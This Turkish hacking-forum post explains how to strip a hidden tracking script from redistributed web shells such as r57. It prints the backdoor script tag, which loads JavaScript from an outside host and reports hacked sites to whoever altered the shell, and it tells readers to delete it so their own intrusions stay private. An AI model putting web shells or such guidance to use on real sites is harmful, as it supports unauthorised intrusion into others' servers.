Shell'deki Logları Silme / GarryKasparov

20 Ağu 2016
73
0
Öncelikle ben bu konuda kendi bildiğim yöntemi anlattım . Bi hatam olursa kusura bakmayın .


Shell'deki Log Nedir ?

Kendini uyanık sanan bazı kişiler piyasadaki en çok kullanılan shell'leri indirip kaynak kodlarının arasına loglar ekleyerek tekrar piyasaya sürerler . Bu ekledikleri loglar sayesinde piyasaya sürdüğü shelli indirip , kullanan kişilerin hackledikleri siteleri tekrar hackleme fırsatı bulup index atarlar .Shell'deki Logları Nasıl Silerim ?

Kullandığımız shell i metin belgesi olarak açıp Ctrl+f yapıyoruz . Açılan kutucuğa "SRC" yazıyoruz ve bul diyoruz .

Zararlı Olan Kod ;
Kod:
<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>

Bu kodu silin . Daha sonra Arayacağımız şey "mail"Bunu silmenize gerek yok bu sadece logdan emin olmak için . Önceden sildiğiniz şey zaten logları engelleyecektir .

İsterseniz Yeni bir shell indirin isterseniz benim gösterdiğim gibi silin . Herkeze kolay gelsin iyi forumlar
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.